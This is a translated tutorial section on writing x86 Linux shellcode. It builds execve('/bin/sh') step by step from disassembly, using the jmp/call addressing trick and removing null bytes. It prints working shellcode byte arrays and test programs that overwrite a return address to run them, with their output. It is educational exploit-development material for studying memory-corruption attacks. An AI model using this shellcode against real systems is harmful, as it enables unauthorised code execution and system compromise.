Shell Code

Date: 2008-06-05   Source: 零度冰水

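Now that we know we can modify the return address, and with it the flow of
execution, what program do we want to run? In most cases we simply want the
program to spawn a shell; from that shell we can then issue whatever commands
we like. But what if the program we are trying to exploit contains no such
code? How can we place arbitrary instructions into its address space? The
answer is to put the code we want to execute into the buffer we are
overflowing, and to overwrite the function's return address so that it points
back into that buffer. Assuming the stack starts at address 0xFF and that S
stands for the code we want to execute, the stack would look like this: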

bottom of  DDDDDDDDEEEEEEEEEEEE  EEEE  FFFF  FFFF  FFFF  FFFF     top of
memory     89ABCDEF0123456789AB  CDEF  0123  4567  89AB  CDEF     memory
           buffer                sfp   ret   a     b     c

<------   [SSSSSSSSSSSSSSSSSSSS][SSSS][0xD8][0x01][0x02][0x03]
           ^                            |
           |____________________________|
top of                                                            bottom of
stack                                                                 stack

    The C code to spawn a shell looks like this:

shellcode.c
-----------------------------------------------------------------------------
#include <stdio.h>
#include <unistd.h>   /* declares execve() */

void main() {
   char *name[2];

   name[0] = "/bin/sh";
   name[1] = NULL;
   execve(name[0], name, NULL);
}
------------------------------------------------------------------------------

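    To find out what this program looks like in assembly, we compile it and
start up gdb. Remember to use the -static flag when compiling. Otherwise the
actual code for the execve system call will not be included; instead there
will be a reference to the dynamic C library, and the real code would only be
linked in at load time.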

------------------------------------------------------------------------------
[aleph1]$ gcc -o shellcode -ggdb -static shellcode.c
[aleph1]$ gdb shellcode
GDB is free software and you are welcome to distribute copies of it
under certain conditions; type "show copying" to see the conditions.
There is absolutely no warranty for GDB; type "show warranty" for details.
GDB 4.15 (i586-unknown-linux), Copyright 1995 Free Software Foundation, Inc...
(gdb) disassemble main
Dump of assembler code for function main:
0x8000130 <main>:       pushl %ebp
0x8000131 <main+1>:     movl   %esp,%ebp
0x8000133 <main+3>:     subl   $0x8,%esp
0x8000136 <main+6>:     movl   $0x80027b8,0xfffffff8(%ebp)
0x800013d <main+13>:    movl   $0x0,0xfffffffc(%ebp)
0x8000144 <main+20>:    pushl $0x0
0x8000146 <main+22>:    leal   0xfffffff8(%ebp),%eax
0x8000149 <main+25>:    pushl %eax
0x800014a <main+26>:    movl   0xfffffff8(%ebp),%eax
0x800014d <main+29>:    pushl %eax
0x800014e <main+30>:    call   0x80002bc <__execve>
0x8000153 <main+35>:    addl   $0xc,%esp
0x8000156 <main+38>:    movl   %ebp,%esp
0x8000158 <main+40>:    popl   %ebp
0x8000159 <main+41>:    ret
End of assembler dump.
(gdb) disassemble __execve
Dump of assembler code for function __execve:
0x80002bc <__execve>:   pushl %ebp
0x80002bd <__execve+1>: movl   %esp,%ebp
0x80002bf <__execve+3>: pushl %ebx
0x80002c0 <__execve+4>: movl   $0xb,%eax
0x80002c5 <__execve+9>: movl   0x8(%ebp),%ebx
0x80002c8 <__execve+12>:        movl   0xc(%ebp),%ecx
0x80002cb <__execve+15>:        movl   0x10(%ebp),%edx
0x80002ce <__execve+18>:        int    $0x80
0x80002d0 <__execve+20>:        movl   %eax,%edx
0x80002d2 <__execve+22>:        testl %edx,%edx
0x80002d4 <__execve+24>:        jnl    0x80002e6 <__execve+42>
0x80002d6 <__execve+26>:        negl   %edx
0x80002d8 <__execve+28>:        pushl %edx
0x80002d9 <__execve+29>:        call   0x8001a34 <__normal_errno_location>
0x80002de <__execve+34>:        popl   %edx
0x80002df <__execve+35>:        movl   %edx,(%eax)
0x80002e1 <__execve+37>:        movl   $0xffffffff,%eax
0x80002e6 <__execve+42>:        popl   %ebx
0x80002e7 <__execve+43>:        movl   %ebp,%esp
0x80002e9 <__execve+45>:        popl   %ebp
0x80002ea <__execve+46>:        ret
0x80002eb <__execve+47>:        nop
End of assembler dump.
------------------------------------------------------------------------------

    Let us look at what is going on here. We start by studying main:

------------------------------------------------------------------------------
0x8000130 <main>:       pushl %ebp
0x8000131 <main+1>:     movl   %esp,%ebp
0x8000133 <main+3>:     subl   $0x8,%esp

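        This is the procedure prelude. It first saves the old frame pointer,
        makes the current stack pointer the new frame pointer, and then
        leaves space for the local variables. In this case that is:

        char *name[2];

        that is, two pointers to char. A pointer is one word long, so it
        leaves space for two words (8 bytes).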

0x8000136 <main+6>:     movl   $0x80027b8,0xfffffff8(%ebp)

        We copy the value 0x80027b8 (the address of the string "/bin/sh")
        into the first pointer of name[]. This is equivalent to:

        name[0] = "/bin/sh";

0x800013d <main+13>:    movl   $0x0,0xfffffffc(%ebp)


        We copy the value 0x0 (NULL) into the second pointer of name[].
        This is equivalent to:

        name[1] = NULL;

        The actual call to execve() starts here:

0x8000144 <main+20>:    pushl $0x0

        We push the arguments to execve() onto the stack in reverse order,
        starting with NULL.

0x8000146 <main+22>:    leal   0xfffffff8(%ebp),%eax

        We load the address of name[] into the EAX register.

0x8000149 <main+25>:    pushl %eax

        We push the address of name[] onto the stack.

0x800014a <main+26>:    movl   0xfffffff8(%ebp),%eax

        We load the address of the string "/bin/sh" into the EAX register.

0x800014d <main+29>:    pushl %eax

        We push the address of the string "/bin/sh" onto the stack.

0x800014e <main+30>:    call   0x80002bc <__execve>

        Call the library procedure execve(). The call instruction pushes the
        IP (instruction pointer) onto the stack.
------------------------------------------------------------------------------

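    Now for execve(). Keep in mind that we are using an Intel-based Linux
system. System call details vary from OS to OS and from CPU to CPU. Some pass
arguments on the stack, others in registers. Some use a software interrupt to
jump to kernel mode, others use a far call. Linux passes the arguments to a
system call in registers and uses a software interrupt to jump into kernel
mode.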

------------------------------------------------------------------------------
0x80002bc <__execve>:   pushl %ebp
0x80002bd <__execve+1>: movl   %esp,%ebp
0x80002bf <__execve+3>: pushl %ebx

        The procedure prelude.

0x80002c0 <__execve+4>: movl   $0xb,%eax

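        Copy 0xb (11 decimal) into the EAX register (the original text
        mistakenly says "onto the stack"). This is the index into the system
        call table; 11 is execve.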

0x80002c5 <__execve+9>: movl   0x8(%ebp),%ebx

        Copy the address of "/bin/sh" into the EBX register.

0x80002c8 <__execve+12>:        movl   0xc(%ebp),%ecx

        Copy the address of name[] into the ECX register.

0x80002cb <__execve+15>:        movl   0x10(%ebp),%edx

        Copy the third argument, the null pointer passed as envp, into the
        EDX register.

0x80002ce <__execve+18>:        int    $0x80

        Change into kernel mode.
------------------------------------------------------------------------------
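
    The same convention can be exercised from C without writing any assembly.
The following is only a sketch, assuming a Linux system with glibc: syscall()
takes a system call number, loads it and any arguments into the registers the
kernel expects, and traps into kernel mode. The helper name raw_getpid is made
up for this illustration, and getpid is used instead of execve so that the
example is harmless to run.

```c
#define _GNU_SOURCE
#include <sys/syscall.h>   /* SYS_getpid */
#include <unistd.h>        /* syscall(), getpid() */

/* Ask the kernel for our process ID by system call number, bypassing the
 * getpid() library wrapper. raw_getpid is a hypothetical helper name. */
long raw_getpid(void)
{
    return syscall(SYS_getpid);
}
```

    The value returned should match what the ordinary getpid() wrapper
reports, since both end up in the same kernel entry point.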


    As we can see, there is not much to the execve() system call. All we need
to do is:

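        a) Have the null-terminated string "/bin/sh" somewhere in memory.
        b) Have the address of the string "/bin/sh" somewhere in memory,
           followed by a null long word.
        c) Copy 0xb into the EAX register.
        d) Copy the address of the string "/bin/sh" into the EBX register.
        e) Copy the address of the address of the string "/bin/sh" into the
           ECX register.
        (Translator's note: the original text swapped EBX and ECX in steps
        d and e.)
        f) Copy the address of the null long word into the EDX register.
        g) Execute the int $0x80 instruction.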

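    But what if the execve() call fails for some reason? The program will
continue fetching instructions from the stack, which may contain random data!
Executing such instructions will most likely end in a core dump. We want the
program to exit cleanly if the execve call fails. To accomplish this we must
add an exit system call after the execve call. What does the exit system call
look like in assembly?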

exit.c
------------------------------------------------------------------------------
#include <stdlib.h>

void main() {
        exit(0);
}
------------------------------------------------------------------------------

------------------------------------------------------------------------------
[aleph1]$ gcc -o exit -static exit.c
[aleph1]$ gdb exit
GDB is free software and you are welcome to distribute copies of it
under certain conditions; type "show copying" to see the conditions.
There is absolutely no warranty for GDB; type "show warranty" for details.
GDB 4.15 (i586-unknown-linux), Copyright 1995 Free Software Foundation, Inc...
(no debugging symbols found)...
(gdb) disassemble _exit
Dump of assembler code for function _exit:
0x800034c <_exit>:      pushl %ebp
0x800034d <_exit+1>:    movl   %esp,%ebp
0x800034f <_exit+3>:    pushl %ebx
0x8000350 <_exit+4>:    movl   $0x1,%eax
0x8000355 <_exit+9>:    movl   0x8(%ebp),%ebx
0x8000358 <_exit+12>:   int    $0x80
0x800035a <_exit+14>:   movl   0xfffffffc(%ebp),%ebx
0x800035d <_exit+17>:   movl   %ebp,%esp
0x800035f <_exit+19>:   popl   %ebp
0x8000360 <_exit+20>:   ret
0x8000361 <_exit+21>:   nop
0x8000362 <_exit+22>:   nop
0x8000363 <_exit+23>:   nop
End of assembler dump.
------------------------------------------------------------------------------

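    The exit system call places 0x1 in EAX, places the exit code in EBX, and
executes "int 0x80". That's it! Most applications return 0 on exit to indicate
no errors, so we will place 0 in EBX as well. Our list of steps for building
the shell code is now: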

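        a) Have the null-terminated string "/bin/sh" somewhere in memory.
        b) Have the address of the string "/bin/sh" somewhere in memory,
           followed by a null long word.
        c) Copy 0xb into the EAX register.
        d) Copy the address of the string "/bin/sh" into the EBX register.
        e) Copy the address of the address of the string "/bin/sh" into the
           ECX register.
        (Translator's note: the original text swapped EBX and ECX in steps
        d and e.)
        f) Copy the address of the null long word into the EDX register.
        g) Execute the int $0x80 instruction.
        h) Copy 0x1 into the EAX register.
        i) Copy 0x0 into the EBX register.
        j) Execute the int $0x80 instruction.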
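
    The effect of appending the exit call can be tried out in plain C before
turning to assembly. This is a rough sketch, assuming Linux with glibc; the
function name execve_then_exit is invented for the illustration. It runs the
two system calls back to back in a child process and reports the child's exit
status. If execve succeeds the second call is never reached; if it fails, the
child still ends cleanly with status 0 instead of running off into garbage.

```c
#define _GNU_SOURCE
#include <stddef.h>
#include <sys/syscall.h>   /* SYS_execve, SYS_exit */
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Run "execve(path, ...); exit(0)" in a child and return the child's exit
 * status, or -1 if fork/waitpid failed or the child died from a signal.
 * execve_then_exit is a hypothetical helper, not part of the original text. */
int execve_then_exit(const char *path)
{
    pid_t pid = fork();
    if (pid < 0)
        return -1;

    if (pid == 0) {
        char *name[2];
        name[0] = (char *)path;   /* address of the string ...            */
        name[1] = NULL;           /* ... followed by a null word          */

        /* execve: number 0xb on 32-bit x86 Linux, other values elsewhere */
        syscall(SYS_execve, path, name, NULL);

        /* exit(0): reached only when execve has failed */
        syscall(SYS_exit, 0);
    }

    int status;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}
```

    Calling it with a path that does not exist makes execve fail, so the
function should return 0, the status set by the fall-through exit call.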

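    Putting these steps together in assembly language, placing the string
after the code, and remembering to place the address of the string and the
null word directly after the string, we have: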

------------------------------------------------------------------------------
        movl   string_addr,string_addr_addr
        movb   $0x0,null_byte_addr
        movl   $0x0,null_addr
        movl   $0xb,%eax
        movl   string_addr,%ebx
        leal   string_addr,%ecx
        leal   null_string,%edx
        int    $0x80
        movl   $0x1, %eax
        movl   $0x0, %ebx
        int    $0x80
        /bin/sh string goes here.
------------------------------------------------------------------------------

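    The problem is that we do not know where in the memory space of the
program we are trying to exploit the code (and the string that follows it)
will be placed. One way around this is to use a JMP and a CALL instruction.
JMP and CALL can use IP-relative addressing, which means we can jump to an
offset from the current IP without needing to know the exact address in
memory we want to jump to. If we place a CALL instruction right before the
"/bin/sh" string, and a JMP instruction that jumps to the CALL, then the
address of the string is pushed onto the stack as the return address when the
CALL executes. All we need to do then is copy that return address into a
register. The CALL instruction can simply call the start of our code above.
Assuming that J stands for the JMP instruction, C for the CALL instruction,
and s for the string, the execution flow would now be: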

bottom of  DDDDDDDDEEEEEEEEEEEE  EEEE  FFFF  FFFF  FFFF  FFFF     top of
memory     89ABCDEF0123456789AB  CDEF  0123  4567  89AB  CDEF     memory
           buffer                sfp   ret   a     b     c

<------   [JJSSSSSSSSSSSSSSCCss][ssss][0xD8][0x01][0x02][0x03]
           ^|^             ^|            |
           |||_____________||____________| (1)
       (2)  ||_____________||
             |______________| (3)
top of                                                            bottom of
stack                                                                 stack

    With these modifications, using indexed addressing, and writing down how
many bytes each instruction takes, our code looks like this:


------------------------------------------------------------------------------
        jmp    offset-to-call           # 2 bytes
        popl   %esi                     # 1 byte
        movl   %esi,array-offset(%esi) # 3 bytes
        movb   $0x0,nullbyteoffset(%esi)# 4 bytes
        movl   $0x0,null-offset(%esi)   # 7 bytes
        movl   $0xb,%eax                # 5 bytes
        movl   %esi,%ebx                # 2 bytes
        leal   array-offset(%esi),%ecx # 3 bytes
        leal   null-offset(%esi),%edx   # 3 bytes
        int    $0x80                    # 2 bytes
        movl   $0x1, %eax               # 5 bytes
        movl   $0x0, %ebx               # 5 bytes
        int    $0x80                    # 2 bytes
        call   offset-to-popl           # 5 bytes
        /bin/sh string goes here.
------------------------------------------------------------------------------
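
    The two jump displacements follow directly from the byte counts in the
listing above. As a small sketch (the function names are made up for this
illustration), the jmp has to skip every instruction between itself and the
call, and the call has to reach back over those same instructions plus its own
length:

```c
#include <stddef.h>

/* Displacement for the leading jmp: the number of bytes between the end of
 * the jmp and the start of the call, i.e. the summed sizes of the
 * instructions in between. */
int jmp_displacement(const int *sizes, size_t count)
{
    int total = 0;
    for (size_t i = 0; i < count; i++)
        total += sizes[i];
    return total;
}

/* Displacement for the trailing call: back over the call itself
 * (call_size bytes) and over everything between popl and the call. */
int call_displacement(const int *sizes, size_t count, int call_size)
{
    return -(jmp_displacement(sizes, count) + call_size);
}
```

    Fed the sizes from popl through the second int $0x80, that is 1, 3, 4, 7,
5, 2, 3, 3, 2, 5, 5 and 2 bytes, together with a 5-byte call, this gives 0x2a
for the jmp and -0x2f for the call.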

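    Calculating the offsets from jmp to call, from call to popl, from the
string address to the array, and from the string address to the null long
word, we get: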

------------------------------------------------------------------------------
        jmp    0x2a                     # 2 bytes
        popl   %esi                     # 1 byte
        movl   %esi,0x8(%esi)           # 3 bytes
        movb   $0x0,0x7(%esi)           # 4 bytes
        movl   $0x0,0xc(%esi)           # 7 bytes
        movl   $0xb,%eax                # 5 bytes
        movl   %esi,%ebx                # 2 bytes
        leal   0x8(%esi),%ecx           # 3 bytes
        leal   0xc(%esi),%edx           # 3 bytes
        int    $0x80                    # 2 bytes
        movl   $0x1, %eax               # 5 bytes
        movl   $0x0, %ebx               # 5 bytes
        int    $0x80                    # 2 bytes
        call   -0x2f                    # 5 bytes
        .string \"/bin/sh\"             # 8 bytes
------------------------------------------------------------------------------
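
    The %esi-relative offsets 0x7, 0x8 and 0xc describe the data laid out
behind the call instruction. One way to picture it, offered only as a sketch:
a C struct whose 32-bit fields stand in for i386 pointers and long words. The
struct and constant names are invented for this illustration.

```c
#include <stddef.h>
#include <stdint.h>

/* Model of the bytes that follow the call instruction, as addressed through
 * %esi. uint32_t stands in for a 32-bit pointer or long word. */
struct shell_data {
    char     path[8];     /* "/bin/sh" plus its terminating null byte */
    uint32_t path_addr;   /* name[0]: address of the string           */
    uint32_t null_word;   /* name[1]: the null long word              */
};

enum {
    NUL_BYTE_OFFSET  = offsetof(struct shell_data, path) + 7,   /* 0x7 */
    ARRAY_OFFSET     = offsetof(struct shell_data, path_addr),  /* 0x8 */
    NULL_WORD_OFFSET = offsetof(struct shell_data, null_word)   /* 0xc */
};
```

    The seven characters of "/bin/sh" occupy offsets 0 through 6, so the
terminator written by the movb lands at offset 7, the pointer at 8 and the
null word at 12.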

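    This looks good. To make sure it works correctly we must compile it and
run it. But there is a problem. Our code modifies itself, and most operating
systems mark code pages read-only. To get around this restriction we must
place the code we wish to execute in the stack or the data segment and
transfer control to it. To do so we will place our code in a global array in
the data segment. First we need a hex representation of the binary code. Let
us compile it, and then use gdb to obtain the bytes.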

shellcodeasm.c
------------------------------------------------------------------------------
void main() {
__asm__("
        jmp    0x2a                     # 2 bytes
        popl   %esi                     # 1 byte
        movl   %esi,0x8(%esi)           # 3 bytes
        movb   $0x0,0x7(%esi)           # 4 bytes
        movl   $0x0,0xc(%esi)           # 7 bytes
        movl   $0xb,%eax                # 5 bytes
        movl   %esi,%ebx                # 2 bytes
        leal   0x8(%esi),%ecx           # 3 bytes
        leal   0xc(%esi),%edx           # 3 bytes
        int    $0x80                    # 2 bytes
        movl   $0x1, %eax               # 5 bytes
        movl   $0x0, %ebx               # 5 bytes
        int    $0x80                    # 2 bytes
        call   -0x2f                    # 5 bytes
        .string \"/bin/sh\"             # 8 bytes
");
}
------------------------------------------------------------------------------

------------------------------------------------------------------------------
[aleph1]$ gcc -o shellcodeasm -g -ggdb shellcodeasm.c
[aleph1]$ gdb shellcodeasm
GDB is free software and you are welcome to distribute copies of it
under certain conditions; type "show copying" to see the conditions.
There is absolutely no warranty for GDB; type "show warranty" for details.
GDB 4.15 (i586-unknown-linux), Copyright 1995 Free Software Foundation, Inc...
(gdb) disassemble main
Dump of assembler code for function main:
0x8000130 <main>:       pushl %ebp
0x8000131 <main+1>:     movl   %esp,%ebp
0x8000133 <main+3>:     jmp    0x800015f <main+47>
0x8000135 <main+5>:     popl   %esi
0x8000136 <main+6>:     movl   %esi,0x8(%esi)
0x8000139 <main+9>:     movb   $0x0,0x7(%esi)
0x800013d <main+13>:    movl   $0x0,0xc(%esi)
0x8000144 <main+20>:    movl   $0xb,%eax
0x8000149 <main+25>:    movl   %esi,%ebx
0x800014b <main+27>:    leal   0x8(%esi),%ecx
0x800014e <main+30>:    leal   0xc(%esi),%edx
0x8000151 <main+33>:    int    $0x80
0x8000153 <main+35>:    movl   $0x1,%eax
0x8000158 <main+40>:    movl   $0x0,%ebx
0x800015d <main+45>:    int    $0x80
0x800015f <main+47>:    call   0x8000135 <main+5>
0x8000164 <main+52>:    das
0x8000165 <main+53>:    boundl 0x6e(%ecx),%ebp
0x8000168 <main+56>:    das
0x8000169 <main+57>:    jae    0x80001d3 <__new_exitfn+55>
0x800016b <main+59>:    addb   %cl,0x55c35dec(%ecx)
End of assembler dump.
(gdb) x/bx main+3
0x8000133 <main+3>:     0xeb
(gdb)
0x8000134 <main+4>:     0x2a
(gdb)
.
.
.
------------------------------------------------------------------------------
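
    Stepping through the bytes one at a time with x/bx and typing them in by
hand is tedious and error-prone. As a sketch only, a helper along the
following lines could turn a byte buffer into the \xNN form used in the test
program. The function format_hex_escapes is hypothetical and not part of the
original workflow.

```c
#include <stddef.h>
#include <stdio.h>

/* Write len bytes from buf into out as "\xNN" escapes. Returns the number of
 * characters written (not counting the terminating null byte), or -1 if out
 * is too small. */
int format_hex_escapes(const unsigned char *buf, size_t len,
                       char *out, size_t out_size)
{
    size_t used = 0;

    if (out_size == 0)
        return -1;
    out[0] = '\0';

    for (size_t i = 0; i < len; i++) {
        if (out_size - used < 5)   /* four characters plus the terminator */
            return -1;
        snprintf(out + used, out_size - used, "\\x%02x", (unsigned)buf[i]);
        used += 4;
    }
    return (int)used;
}
```

    Given the first bytes of the routine, 0xeb 0x2a 0x5e, it produces the text
\xeb\x2a\x5e, ready to paste between double quotes.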

testsc.c
------------------------------------------------------------------------------
char shellcode[] =
        "\xeb\x2a\x5e\x89\x76\x08\xc6\x46\x07\x00\xc7\x46\x0c\x00\x00\x00"
        "\x00\xb8\x0b\x00\x00\x00\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80"
        "\xb8\x01\x00\x00\x00\xbb\x00\x00\x00\x00\xcd\x80\xe8\xd1\xff\xff"
        "\xff\x2f\x62\x69\x6e\x2f\x73\x68\x00\x89\xec\x5d\xc3";

void main() {
   int *ret;

   ret = (int *)&ret + 2;
   (*ret) = (int)shellcode;

}
------------------------------------------------------------------------------
------------------------------------------------------------------------------
[aleph1]$ gcc -o testsc testsc.c
[aleph1]$ ./testsc
$ exit
[aleph1]$
------------------------------------------------------------------------------

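    It works! But there is an obstacle. In most cases we will be trying to
overflow a character buffer. As such, any null byte in our shellcode will be
taken as the end of the string, and the copy will stop there. For the exploit
to work, the shellcode must contain no null bytes. Let us eliminate those
bytes and tighten up the code at the same time.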
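
    The truncation is easy to observe. The sketch below, with a made-up
helper name, copies a byte sequence the way a vulnerable strcpy() would and
reports how many bytes actually arrived at the destination.

```c
#include <stddef.h>
#include <string.h>

/* Copy payload into dst as strcpy() does and return how many payload bytes
 * arrived. payload must end with a null terminator and dst must be large
 * enough to hold it. bytes_surviving_strcpy is a hypothetical helper. */
size_t bytes_surviving_strcpy(char *dst, const char *payload)
{
    strcpy(dst, payload);   /* stops at the first null byte it meets */
    return strlen(dst);
}
```

    With the first 13 bytes of the shellcode array from testsc.c as the
payload, only 9 bytes get through: the tenth byte is the 0x00 immediate of
the movb instruction, and everything after it is lost.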

           Problem instruction:                 Substitute with:
           --------------------------------------------------------
           movb   $0x0,0x7(%esi)                xorl   %eax,%eax
           movl   $0x0,0xc(%esi)                movb   %al,0x7(%esi)
                                                movl   %eax,0xc(%esi)
           --------------------------------------------------------
           movl   $0xb,%eax                     movb   $0xb,%al
           --------------------------------------------------------
           movl   $0x1, %eax                    xorl   %ebx,%ebx
           movl   $0x0, %ebx                    movl   %ebx,%eax
                                                inc    %eax
           --------------------------------------------------------
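
   Whether a substitution really removes the null bytes can be checked
against the machine code itself. The sketch below scans a few encodings for
zero bytes; the byte values are taken from the two shellcode arrays in this
section, while the function and array names are made up for the illustration.

```c
#include <stddef.h>

/* Return 1 if any of the len bytes in code is zero, 0 otherwise. */
int has_nul_byte(const unsigned char *code, size_t len)
{
    for (size_t i = 0; i < len; i++)
        if (code[i] == 0)
            return 1;
    return 0;
}

/* Encodings as they appear in the shellcode arrays of the test programs. */
static const unsigned char movl_0xb_eax[] = {0xb8, 0x0b, 0x00, 0x00, 0x00};
static const unsigned char movb_0xb_al[]  = {0xb0, 0x0b};
static const unsigned char movl_0_ebx[]   = {0xbb, 0x00, 0x00, 0x00, 0x00};
static const unsigned char xorl_ebx_ebx[] = {0x31, 0xdb};
```

   The 32-bit immediate forms carry their zero padding into the instruction
stream, while the 8-bit move and the xor need no immediate zeros at all. They
are also shorter, which is where the size saving comes from.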

   Our improved code:

shellcodeasm2.c
------------------------------------------------------------------------------
void main() {
__asm__("
        jmp    0x1f                     # 2 bytes
        popl   %esi                     # 1 byte
        movl   %esi,0x8(%esi)           # 3 bytes
        xorl   %eax,%eax                # 2 bytes
        movb   %al,0x7(%esi)            # 3 bytes
        movl   %eax,0xc(%esi)           # 3 bytes
        movb   $0xb,%al                 # 2 bytes
        movl   %esi,%ebx                # 2 bytes
        leal   0x8(%esi),%ecx           # 3 bytes
        leal   0xc(%esi),%edx           # 3 bytes
        int    $0x80                    # 2 bytes
        xorl   %ebx,%ebx                # 2 bytes
        movl   %ebx,%eax                # 2 bytes
        inc    %eax                     # 1 byte
        int    $0x80                    # 2 bytes
        call   -0x24                    # 5 bytes
        .string \"/bin/sh\"             # 8 bytes
                                        # 46 bytes total
");
}
------------------------------------------------------------------------------

   And our new test program:

testsc2.c
------------------------------------------------------------------------------
char shellcode[] =
        "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
        "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
        "\x80\xe8\xdc\xff\xff\xff/bin/sh";

void main() {
   int *ret;

   ret = (int *)&ret + 2;
   (*ret) = (int)shellcode;

}
------------------------------------------------------------------------------
------------------------------------------------------------------------------
[aleph1]$ gcc -o testsc2 testsc2.c
[aleph1]$ ./testsc2
$ exit
[aleph1]$
------------------------------------------------------------------------------